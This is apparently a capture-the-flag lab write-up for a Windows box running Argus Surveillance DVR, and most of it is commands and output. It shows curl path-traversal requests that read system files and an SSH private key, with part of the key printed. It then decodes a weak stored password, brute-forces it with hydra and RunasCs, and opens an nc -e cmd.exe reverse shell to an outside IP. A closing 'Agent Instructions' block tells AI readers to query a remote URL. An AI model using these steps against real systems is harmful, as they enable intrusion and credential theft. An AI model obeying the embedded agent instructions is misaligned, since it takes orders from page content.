# DVR4
## Gaining Access
Nmap scan:
```
$ nmap -p- --min-rate 4000 -Pn 192.168.201.179
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 14:10 +08
Nmap scan report for 192.168.201.179
Host is up (0.17s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
7680/tcp open pando-pub
8080/tcp open http-proxy
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
```
SSH is open on this Windows machine, so let's take note of that.
### Argus Surveillance -> LFI SSH Key
Port 8080 hosted an Argus Surveillance instance:
There are quite a few exploits for this software:
```
$ searchsploit argus
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Argus Surveillance DVR 4.0 - Unquoted Service Path | windows/local/50261.txt
Argus Surveillance DVR 4.0 - Weak Password Encryption | windows/local/50130.py
Argus Surveillance DVR 4.0.0.0 - Directory Traversal | windows_x86/webapps/45296.txt
Argus Surveillance DVR 4.0.0.0 - Privilege Escalation | windows_x86/local/45312.c
----------------------------------------------------------- ---------------------------------
```
The LFI one looks the easiest to exploit, and it involves using `curl`:
{% code overflow="wrap" %}
```
$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
```
{% endcode %}
It works, so now we just need to find out what to read. I know that SSH is open, so we should be looking for a SSH private key of some user. On the website, we can view the users to see 2:
`viewer` is one them, and we can try to read their private key:
```
$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J
Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP
```
Using this, we can `ssh` into the machine as `viewer`:
## Privilege Escalation
### Password Decryption -> SYSTEM Shell
I tested the LFI in reading the administrator flag, and it actually worked:
{% code overflow="wrap" %}
```
$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FAdministrator%2FDesktop%2fproof.txt&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
```
{% endcode %}
This means that the application is being run by the administrator instead of `viewer`. There were other exploits that we didn't use yet. I found that the Weak Password Encryption was one of them. This involved reading the password hash from the configuration files of Argus.
```
C:\ProgramData\PY_Software\Argus Surveillance DVR>type DVRParams.ini
LoginName0=Administrator
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
```
We can decrypt this hash easily using the script:
```
$ python3 50130.py
#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown
```
The last character is unknown. When looking at the script, it doesn't seem to map special characters within the dictionary. In this case, we can create a wordlist of the special characters.
```
$ cat /usr/share/seclists/Fuzzing/special-chars.txt > wordlist.txt
$ sed -i -e 's/^/14WatchD0g/' wordlist.txt
```
Afterwards, we can attempt to brute force the `ssh` access using `hydra`:
```
$ hydra -l administrator -P wordlist.txt 192.168.201.179 ssh
```
However, this didn't work for some reason, so maybe the administrator does not have SSH access. Instead, I brute forced the passwords one by one with `RunasCs.exe` to check which worked.
Eventually one worked:
```
C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g# whoami
[-] RunasCsException: CreateProcessWithLogonW failed with 1326
C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g$ whoami
dvr4\administrator
```
Great! Now we just need to get a reverse shell. The exploits earlier have the `x86` tag, meaning that this is a 32-bit Windows computer and we should be using `nc32.exe` for a reverse shell.
Then, we just need to execute it:
```
C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g$ "C:\Windows\Tasks\nc.exe -e cmd.exe 1
92.168.45.191 21"
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/windows/dvr4.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.